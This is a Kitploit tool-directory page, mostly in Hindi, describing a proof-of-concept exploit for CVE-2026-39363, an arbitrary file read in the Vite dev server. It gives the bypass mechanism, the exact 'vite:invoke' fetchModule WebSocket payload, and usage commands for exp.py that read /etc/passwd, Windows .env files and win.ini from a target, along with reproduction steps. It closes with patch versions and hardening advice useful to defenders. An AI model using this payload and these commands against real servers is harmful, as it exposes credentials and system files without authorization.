Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39363 — 方便实用的CVE-2026-39363利用工具 | Kitploit
उपकरण/GitHubGitHub/sunynov/cve-2026-39363
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPenetration Testing
GitHubsunynov/cve-2026-39363

CVE-2026-39363

方便实用的CVE-2026-39363利用工具

रिपॉजिटरी देखें
16 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-39363 — Vite Dev Server मनमाना फ़ाइल पठन PoC

GHSA-p9ff-h696-f583 के लिए सीधे चलाने योग्य PoC। अनप्रमाणित HMR WebSocket के माध्यम से fetchModule को कॉल करके, HTTP परत की server.fs.allow सीमा को बायपास करता है और dev server वाली मशीन पर कोई भी फ़ाइल पढ़ता है।

प्रभावित दायरा

संस्करण रेखाप्रभावितसमाधान
Vite 6>=6.0.0, <=6.4.16.4.2
Vite 7>=7.0.0, <=7.3.17.3.2
Vite 8>=8.0.0, <=8.0.48.0.5
vite-plus (VoidZero शाखा)<=0.1.150.1.16

शोषण की पूर्वापेक्षाएँ:

  • dev server नेटवर्क पर उजागर हो (--host / server.host कॉन्फ़िगरेशन), और
  • HMR WebSocket अक्षम न हो (डिफ़ॉल्ट रूप से सक्षम, server.ws: false से बंद किया जा सकता है)।

CVSS 3.1 7.5 High (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N), CWE-200 + CWE-306। CISA SSVC ने exploitation=poc, automatable=yes चिह्नित किया है।

सिद्धांत

  1. HTTP परत पर किसी भी फ़ाइल को पढ़ना server.fs.allow द्वारा रोक दिया जाता है (/@fs/<绝对路径> → 403)।
  2. लेकिन HMR WebSocket का हैंडशेक केवल यह जाँचता है:
    • Sec-WebSocket-Protocol: vite-hmr हेडर, और
    • Origin हेडर होने पर ही ?token= क्वेरी पैरामीटर की आवश्यकता (CWE-306: गैर-ब्राउज़र क्लाइंट बिना Origin हेडर भेजे सीधे जुड़ सकते हैं)।
  3. जुड़ने के बाद vite:invoke कस्टम इवेंट भेजकर सर्वर पर पंजीकृत fetchModule विधि को कॉल किया जाता है, जिसमें file://<绝对路径>?raw भेजा जाता है। fetchModule सीधे मॉड्यूल transform पाइपलाइन से गुजरता है, पूरी तरह से fs.allow जाँच को बायपास करता है, और फ़ाइल सामग्री को export default "..." के रूप में लौटाता है (CWE-200)।

vite:invoke अनुरोध संदेश संरचना (v6/v7/v8 समान):

root@kitploit:~
{
  "type": "custom",
  "event": "vite:invoke",
  "data": {
    "name": "fetchModule",
    "id": "1send",
    "data": ["file:///etc/passwd?raw"]
  }
}

सर्वर के प्रत्युत्तर में id बदलकर 1response हो जाता है, और data.data.result.code फ़ाइल सामग्री होती है।

उपयोग

केवल Python 3 मानक पुस्तकालय आवश्यक है, कोई तृतीय-पक्ष निर्भरता नहीं:

root@kitploit:~
# 读单个文件(POSIX 路径)
python exp.py http://target:5173 /etc/passwd

# Windows 路径 + 读多个文件
python exp.py http://target:5173 C:/Users/admin/.env C:/Windows/win.ini

# 保存到目录(文件名按路径自动安全化)
python exp.py http://target:5173 /etc/passwd /etc/hosts -o dump/

# HTTPS dev server
python exp.py https://target:5173 /etc/passwd

# 目标配置了 allowedHosts 域名白名单时,用 IP/localhost 当 Host 头
python exp.py http://192.168.1.10:5173 /etc/passwd --host-header localhost:5173

पैरामीटर:

सत्यापन रिकॉर्ड

इस रिपॉज़िटरी के PoC का निम्नलिखित वातावरणों में सफलतापूर्वक परीक्षण किया गया है (dev server root के बाहर का secret.txt पढ़ा गया, HTTP @fs पथ पर उसी फ़ाइल के लिए 403 मिला):

  • Vite 8.0.4 (vite --host 0.0.0.0, Windows)
  • Vite 6.4.1 (वही)
  • Vite 7.3.1 के स्रोत कोड की तुलना से पुष्टि हुई कि संदेश संरचना v6/v8 के समान है

पुनरुत्पादन चरण (PoC के समान क्रम):

root@kitploit:~
# 1. 起一个暴露到网络的受影响 dev server
npm i [email protected] && npx vite --host 0.0.0.0 --port 5173

# 2. HTTP 路径被 fs.allow 拦(预期 403)
curl -i 'http://target:5173/@fs/<root外绝对路径>?raw'   # -> 403

# 3. WebSocket 路径可读(本 PoC)
python exp.py http://target:5173 <root外绝对路径>

पहचान और सुरक्षा सुदृढ़ीकरण

  • अपग्रेड करें 6.4.2 / 7.3.2 / 8.0.5 पर।
  • dev server को कभी भी सार्वजनिक नेटवर्क पते से न बाँधें (डिफ़ॉल्ट रूप से केवल localhost सुनता है)।
  • प्रोडक्शन बिल्ड के लिए vite build + स्टैटिक होस्टिंग उपयोग करें, vite dev न चलाएँ।
  • अपग्रेड संभव न हो तो: server.ws: false से HMR अक्षम करें, या रिवर्स प्रॉक्सी जोड़कर केवल स्थानीय मशीन को ही dev server पोर्ट तक पहुँच दें।

अस्वीकरण

केवल अधिकृत पेनेट्रेशन परीक्षण, कमज़ोरी पुनरुत्पादन और रक्षा अनुसंधान में उपयोग के लिए। बिना अनुमति के दूसरों के सिस्टम पर इस टूल के उपयोग से होने वाले परिणामों की ज़िम्मेदारी उपयोगकर्ता की होगी।

टूल डाउनलोड करें
पैरामीटरविवरण
urlलक्ष्य, जैसे http://192.168.1.10:5173
filesपढ़ने के लिए पूर्ण पथ, POSIX या Windows शैली दोनों मान्य
--host-headerनकली Host हेडर (डिफ़ॉल्ट रूप से लक्ष्य का host लिया जाता है)। डिफ़ॉल्ट रूप से केवल IP/localhost को अनुमति है, कस्टम डोमेन के लिए स्पष्ट कॉन्फ़िगरेशन आवश्यक है
--ws-pathHMR WebSocket पथ, डिफ़ॉल्ट / (यदि लक्ष्य में server.hmr.path कॉन्फ़िगर किया गया है तो इसे बदलना होगा)
--timeoutएकल अनुरोध का टाइमआउट सेकंड, डिफ़ॉल्ट 10
-o/--output-dirपढ़ी गई सामग्री को निर्देशिका में सहेजें